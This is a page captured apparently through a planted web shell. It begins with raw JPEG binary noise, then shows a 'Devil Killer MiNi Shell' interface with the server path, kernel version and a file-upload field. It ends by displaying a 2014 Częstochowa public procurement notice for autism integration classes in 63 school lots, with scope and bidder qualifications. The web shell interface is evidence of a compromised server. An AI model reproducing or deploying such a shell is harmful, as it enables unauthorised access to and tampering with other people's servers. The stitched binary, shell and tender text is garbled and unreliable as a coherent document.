JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140718/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140718/156467-N-2014.html

<p class="kh_header"><b>Częstochowa: Usługa przeprowadzenia zajęć integracyjnych  w ramach tutoringu - autyzm i zespół aspergera - w placówkach szkolnych podlegających Gminie Miastu Częstochowie biorących udział w projekcie pn. Szkoła bez barier - 63 części.</b><br>
<b>Numer ogłoszenia: 156467 - 2014; data zamieszczenia: 18.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Częstochowa , ul. Śląska 11/13, 42-217 Częstochowa, woj. śląskie, tel. 34 3707100, faks 34 3707170.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czestochowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa przeprowadzenia zajęć integracyjnych  w ramach tutoringu - autyzm i zespół aspergera - w placówkach szkolnych podlegających Gminie Miastu Częstochowie biorących udział w projekcie pn. Szkoła bez barier - 63 części..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres zamówienia:
1.1. Przeprowadzenie zajęć integracyjnych w ramach tutoringu -  AUTYZM I ZESPÓŁ  ASPERGERA (KLASY I - III)- ALTERNATYWNE METODY KOMUNIKACJI.
Ww. zajęcia prowadzone będą jako części:
część 1: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 22 im. Gabriela Narutowicza,
część 2: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 25 im. Stanisława Staszica,
część 3: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 34 im. Aleksandra Hrabiego Fredry,
1.2. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - AUTYZM I ZESPÓŁ ASPERGERA (KLASY I - III) - GRY I ZABAWY RUCHOWE.
Ww. zajęcia prowadzone będą jako części:
część 4: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 17 z Oddziałami Integracyjnymi im. Stanisława Wyspiańskiego,
część 5: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 22 im. Gabriela Narutowicza,
część 6: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 25 im. Stanisława Staszica,
część  7: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 35, 
część 8: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 49 im. Janusza Kusocińskiego,
część 9: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 53 z Oddziałami Integracyjnymi im. Marii Skłodowskiej - Curie, 
część 10: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 54 w Zespole Szkół nr 1 z Oddziałami Integracyjnymi im. Powstania Warszawskiego
1.3. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - AUTYZM I ZESPÓŁ ASPERGERA (KLASY I - III)  - TERAPIA PRZEZ SZTUKĘ.
Ww. zajęcia prowadzone będą jako części:
część 11: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 20 w ZSP nr 3,
część 12: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 25 im. Stanisława Staszica,
część 13: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 32 im. Jerzego Dudy - Gracza,
część 14: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 35,
część 15: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 50 im. Generała Władysława Sikorskiego,
część 16: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 54 w Zespole Szkół nr 1 z Oddziałami Integracyjnymi im. Powstania Warszawskiego.
1.4. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - AUTYZM I ZESPÓŁ ASPERGERA (KLASY I - III)- METODA DOBREGO STARTU.
Ww. zajęcia prowadzone będą jako części:
część 17: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 35,
część 18: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 52 im. Małego Powstańca,
część 19: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 53 z Oddziałami Integracyjnymi im. Marii Skłodowskiej - Curie,
część 20: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 54 w Zespole Szkół nr 1 z Oddziałami Integracyjnymi im. Powstania Warszawskiego,
1.5. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - AUTYZM I ZESPÓŁ ASPERGERA (KLASY I - III)-METODA RUCHU ROZWIJAJĄCEGO.
Ww. zajęcia prowadzone będą jako części:
część 21: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 35, 
część 22: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 49 im. Janusza Kusocińskiego.
1.6. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING - AUTYZM I ZESPÓŁ ASPERGERA (KLASY I - III) - EDUKACJA PRZEZ RUCH WEDŁUG DOROTY DZIAMSKIEJ.
Ww. zajęcia prowadzone będą jako części:
część 23: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 20 w ZSP nr 3,
część 24: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 49 im. Janusza Kusocińskiego.

1.7. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING - AUTYZM I ZESPÓŁ ASPERGERA (KLASY I - III)- wschodnie sztuki walki
Ww. zajęcia prowadzone będą jako części:
część 25: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 8 im. Haliny Poświatowskiej,
część 26: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 12 im. Bolesława Chrobrego,
część 27: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 22 im. Gabriela Narutowicza,
część 28: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 24 im. Jana Marcina Szancera,
część 29: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 53 z Oddziałami Integracyjnymi im. Marii Skłodowskiej - Curie,
część 30: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 54 w Zespole Szkół nr 1 z Oddziałami Integracyjnymi im. Powstania Warszawskiego.
1.8. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING - AUTYZM I ZESPÓŁ ASPERGERA (KLASY I - III) - taniec.
Ww. zajęcia prowadzone będą jako części:
część 31: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 12 im.  Bolesława Chrobrego,
część 32: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 22 im. Gabriela Narutowicza,
część 33: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 52 im. Małego Powstańca,
część 34: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 54 w Zespole Szkół nr 1 z Oddziałami Integracyjnymi im. Powstania Warszawskiego,
1.9. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING - AUTYZM I ZESPÓŁ ASPERGERA (KLASY I - III) - joga.
część 35: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 54 w Zespole Szkół nr 1 z Oddziałami Integracyjnymi im. Powstania Warszawskiego.
1.10. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING - AUTYZM I ZESPÓŁ ASPERGERA (KLASY IV-VI) - alternatywne metody komunikacji
Ww. zajęcia prowadzone będą jako części:
część 36: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 22 im. Gabriela Narutowicza,
część 37: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 54 w Zespole Szkół nr 1 z Oddziałami Integracyjnymi im. Powstania Warszawskiego.
1.11. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING - AUTYZM I ZESPÓŁ ASPERGERA (KLASY IV-VI) - gry i zabawy ruchowe.
Ww. zajęcia prowadzone będą jako części:
część 38: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 33 im. Marii Kownackiej,
część 39: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 54 w Zespole Szkół nr 1 z Oddziałami Integracyjnymi im. Powstania Warszawskiego
1.12.Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING -   AUTYZM I ZESPÓŁ ASPERGERA (KLASY IV-VI) - terapia przez sztukę
Ww. zajęcia prowadzone będą jako części:
część 40: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 17 z Oddziałami Integracyjnymi im. Stanisława Wyspiańskieg,o
część 41: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 39 im. Marii Konopnickiej,
część 42: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 54 w Zespole Szkół nr 1 z Oddziałami Integracyjnymi im. Powstania Warszawskiego.
1.13. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING
AUTYZM I ZESPÓŁ ASPERGERA (KLASY IV-VI) - metoda dobrego startu.
Ww. zajęcia prowadzone będą jako części:
część 43: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 52 im. Małego Powstańca,
część 44: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 54 w Zespole Szkół nr 1 z Oddziałami Integracyjnymi im. Powstania Warszawskiego.
1.14. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING - AUTYZM I ZESPÓŁ ASPERGERA (KLASY IV-VI) - edukacja przez ruch wg Doroty Dziamskiej:
część 45: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 35.
1.15. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING - AUTYZM I ZESPÓŁ ASPERGERA (KLASY IV-VI) - wschodnie sztuki walki.
Ww. zajęcia prowadzone będą jako części:
część 46: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 8 im. Haliny Poświatowskiej,
część 47: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 12 im. Bolesława Chrobrego,
część 48: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 22 im. Gabriela Narutowicza,
część 49: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 39 im. Marii Konopnickiej,
część 50: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 54 w Zespole Szkół nr 1 z Oddziałami Integracyjnymi im. Powstania Warszawskiego.
1.16. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING - AUTYZM I ZESPÓŁ ASPERGERA (KLASY IV-VI) - taniec.
Ww. zajęcia prowadzone będą jako części:
część 51: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 22 im. Gabriela Narutowicza,
część 52: Przeprowadzenie zajęć integracyjnych w Szkole Podstawowej nr 39 im. Marii Konopnickiej.
1.17. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING - AUTYZM I ZESPÓŁ ASPERGERA (Gimnazja) - terapia przez sztukę:
część 53: Przeprowadzenie zajęć integracyjnych w Gimnazjum nr 18 z Oddziałami Integracyjnymi im. Kazimierza Wielkiego.
1.18. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING - AUTYZM I ZESPÓŁ ASPERGERA (Gimnazja) -  metoda ruchu rozwijającego:
część 54: Przeprowadzenie zajęć integracyjnych w Gimnazjum nr 1 im. Jana III Sobieskiego.
1.19. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING - AUTYZM I ZESPÓŁ ASPERGERA (Gimnazja) - wschodnie sztuki walki.
Ww. zajęcia prowadzone będą jako części:
część 55: Przeprowadzenie zajęć integracyjnych w Gimnazjum nr 8 im. Polskich Olimpijczyków,
część 56: Przeprowadzenie zajęć integracyjnych w Gimnazjum nr 17 im. Huberta Wagnera,
1.20. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING - AUTYZM I ZESPÓŁ ASPERGERA (Gimnazja) -  pilates:
część 57: Przeprowadzenie zajęć integracyjnych w Gimnazjum nr 10  w Zespole Szkół nr 1 z Oddziałami Integracyjnymi im. Powstania Warszawskiego.
1.21. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING - AUTYZM I ZESPÓŁ ASPERGERA (Gimnazja) - joga:
część 58: Przeprowadzenie zajęć integracyjnych w Gimnazjum nr 2 im. Pokolenia Kolumbów.
1.22. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING - AUTYZM I ZESPÓŁ ASPERGERA (Licea Ogólnokształcące) - alternatywne metody komunikacji:
część 59: Przeprowadzenie zajęć integracyjnych w IX Liceum Ogólnokształcącym im. Cypriana Kamila Norwida.
1.23. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING - AUTYZM I ZESPÓŁ ASPERGERA (Licea Ogólnokształcące) - terapia przez sztukę:
część 60: Przeprowadzenie zajęć integracyjnych w IX Liceum Ogólnokształcącym im. Cypriana Kamila Norwida.
1.24. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING - AUTYZM I ZESPÓŁ ASPERGERA (Licea Ogólnokształcące) - wschodnie sztuki walki:
część 61: Przeprowadzenie zajęć integracyjnych w IX Liceum Ogólnokształcącym im. Cypriana Kamila Norwida
1.25. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING - AUTYZM I ZESPÓŁ ASPERGERA (Licea Ogólnokształcące) - taniec:
część 62: Przeprowadzenie zajęć integracyjnych w VI Liceum Ogólnokształcącym im. Jarosława Dąbrowskiego.
1.26. Przeprowadzenie zajęć integracyjnych w ramach tutoringu - TUTORING - AUTYZM I ZESPÓŁ ASPERGERA (Licea Ogólnokształcące) -joga.
część 63: Przeprowadzenie zajęć integracyjnych w IX Liceum Ogólnokształcącym im. Cypriana Kamila Norwida
Szczegółowy opis przedmiotu zamówienia zawiera specyfikacja istotnych warunków zamówienia (załącznik nr 1 do SIWZ), która jest załącznikiem do ogłoszenia o zamówieniu i jest dostępna na stronie internetowej zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.20.00.00-6, 80.31.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 63.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia i które spełniają poniższe kryteria w zakresie niżej wymienionych części:
1.Części od 1 do 3 od 36 do 37 oraz 59 - alternatywne metody komunikacji, posiadają:
a) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
b) ukończone studia podyplomowe lub kursy kwalifikacyjne z zakresu pedagogiki specjalnej,
c) co najmniej 1 rok doświadczenia w pracy z osobami z autyzmem,
d) ukończony kurs, warsztat lub szkolenie z zakresu: Alternatywne metody komunikacji.
2. Części od 4 do 10, od 38 do 39 - gry i zabawy ruchowe, posiadają:
a) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
b) ukończone studia podyplomowe lub kursy kwalifikacyjne z zakresu pedagogiki specjalnej,
c) co najmniej 1 rok doświadczenia w pracy z osobami z autyzmem.
3.Części od 11 do 16, od 40 do 42 oraz 53 i 60 - terapia przez sztukę, posiadają: 
a) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
b) ukończone studia podyplomowe lub kursy kwalifikacyjne z zakresu pedagogiki specjalnej,
c) co najmniej 1 rok doświadczenia w pracy z osobami z autyzmem
d) ukończony kurs, warsztat lub szkolenie z zakresu Terapii przez sztukę.
4.Części od 17 do 22, od 43 do 44 oraz 54 -  metody dobrego startu oraz metody ruchu rozwijającego, posiadają: 
a) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
b) ukończone studia podyplomowe lub kursy kwalifikacyjne z zakresu pedagogiki specjalnej,
c) co najmniej 1 rok doświadczenia w pracy z osobami z autyzmem
d) ukończony kurs, warsztat lub szkolenie z zakresu Metoda dobrego startu.
5.Części od 23 do 24 oraz 45 - edukacja przez ruch wg. Doroty Dziamskiej,  posiadają: 
a) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,
b) ukończone studia podyplomowe lub kursy kwalifikacyjne z zakresu pedagogiki specjalnej,
c) co najmniej 1 rok doświadczenia w pracy z osobami z autyzmem
d) ukończony kurs, warsztat lub szkolenie z zakresu Edukacja przez ruch wg. Doroty Dziamskiej .
6.Części od 25 do 30, od 46 do 50, od 55 do 56 i 61 - wschodnie sztuk walki, posiadają:
a)osoba 1: instruktor wschodnich sztuk walki - I DAN, co najmniej 100 godzin w pracy z osobami z autyzmem
b) osoba 2: instruktor wschodnich sztuk walki, co najmniej 100 godzin w pacy z osobami z autyzmem.
7.Części od 31 do 34, od 51 do 52 oraz 62 - taniec, posiadają:
a) instruktora tańca nowoczesnego, 
b) co najmniej 100 godzin w pracy z osobami z autyzmem.
8. Część 35, 58 i 63 - joga, posiadają:
a) instruktora jogi, 
b) co najmniej 100 godzin w pracy z osobami z autyzmem.
9.Część 57 - pilates, posiadają:
a) instruktora pilatesu, 
b) co najmniej 100 godzin w pracy z osobami z autyzmem.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wymagania dotyczące dokumentów, określonych w punktach 6.1. i 6.2. specyfikacji.
1.1. Dokumenty, o których mowa w punkcie 6.1.c) i 6.2.a) winny być złożone w oryginale. Dokument, o którym mowa w punkcie 6.1.b) winien być złożony w oryginale lub kopii poświadczonej za zgodność z oryginałem przez osoby uprawnione do składania oświadczeń woli w imieniu wykonawcy. Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.
1.2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, to:
1) zamiast dokumentu, o którym mowa w punkcie 6.1.b) specyfikacji, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
2) Dokumenty, o których mowa w podpunkcie 1) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3) Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w podpunkcie 1), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Przepis podpunktu 2) stosuje się odpowiednio.
1.3. W przypadku składania oferty wspólnej przez kilku przedsiębiorców (tzw. konsorcjum) lub przez spółkę cywilną, każdy ze wspólników konsorcjum lub spółki cywilnej musi złożyć dokumenty wymienione w punkcie 6.1. specyfikacji (lub w punkcie 6.3.2. specyfikacji - jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej wraz z dokumentem wymienionym w punkcie 6.1.a) i 6.1.c) specyfikacji).
Pozostałe dokumenty będą traktowane jako wspólne. Wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników.
